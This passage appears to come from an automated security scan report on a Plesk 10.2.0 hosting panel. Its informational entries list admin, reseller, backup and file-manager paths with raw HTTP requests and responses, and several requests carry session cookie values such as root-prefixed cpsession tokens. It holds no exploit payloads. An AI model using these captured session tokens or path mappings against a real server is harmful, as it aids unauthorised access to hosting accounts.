Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=7203632a9a010a5b09a3ec1de15b3691; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 12:16:00 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 12:16:00 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.153. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@2/domain@1/hosting/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@2/domain@1/hosting/

Request

GET /plesk/client@2/domain@1/hosting/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=7203632a9a010a5b09a3ec1de15b3691; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 12:16:00 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 12:16:00 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.154. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@2/domain@1/hosting/file-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@2/domain@1/hosting/file-manager/

Request

GET /plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&file=/httpdocs HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7203632a9a010a5b09a3ec1de15b3691; locale=en-US

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 12:15:59 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 12:15:59 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.155. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/domain-summary-report/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@3/domain-summary-report/

Request

GET /plesk/client@3/domain-summary-report/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; psaContext=home; BarExpanded=True

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:55:42 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 15:55:42 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.156. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/domain@any/traffic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@3/domain@any/traffic/

Request

GET /plesk/client@3/domain@any/traffic/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; psaContext=home; BarExpanded=True

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:55:39 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 15:55:39 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.157. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/ipaddress@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@3/ipaddress@/

Request

GET /plesk/client@3/ipaddress@/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; psaContext=reseller-tools; BarExpanded=True

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:55:39 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 15:55:39 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.158. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/logo/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@3/logo/

Request

GET /plesk/client@3/logo/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; psaContext=tools; BarExpanded=True

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:55:54 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 15:55:54 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.159. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/skeleton/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@3/skeleton/

Request

GET /plesk/client@3/skeleton/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; psaContext=home; BarExpanded=True

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:55:41 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 15:55:41 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.160. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@5/domain@any/traffic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@5/domain@any/traffic/

Request

GET /plesk/client@5/domain@any/traffic/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/client@any/traffic/
Cookie: locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; psaContext=reseller-tools; BarExpanded=True

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:55:56 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 15:55:56 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.161. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/modules/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/modules/

Request

GET /plesk/modules/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Fri, 23 Sep 2011 19:19:39 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:19:39 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.162. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/

Request

GET /plesk/reseller@3/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 14:43:57 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:43:57 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.163. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/local-repository/

Request

GET /plesk/reseller@3/backup/local-repository/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; psaContext=home; BarExpanded=True

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:55:48 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 15:55:48 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.164. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/client@any/traffic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/client@any/traffic/

Request

GET /plesk/reseller@3/client@any/traffic/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; psaContext=reseller-tools; BarExpanded=True

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:55:37 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 15:55:37 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.165. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/custom-buttons/

Request

GET /plesk/reseller@3/custom-buttons/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; psaContext=home; BarExpanded=True

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:55:44 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 15:55:44 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.166. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/custom-button@new/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/custom-buttons/custom-button@new/properties/

Request

GET /plesk/reseller@3/custom-buttons/custom-button@new/properties/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; psaContext=subscriptions; BarExpanded=True

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:56:00 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 15:56:00 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.167. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/manage-domain/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/manage-domain/

Request

GET /plesk/reseller@3/manage-domain/?cmd=doms_mng&mpc_connect=true HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; psaContext=home; BarExpanded=True

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:55:55 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 15:55:55 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.168. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/preferences  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/preferences

Request

GET /plesk/reseller@3/preferences HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
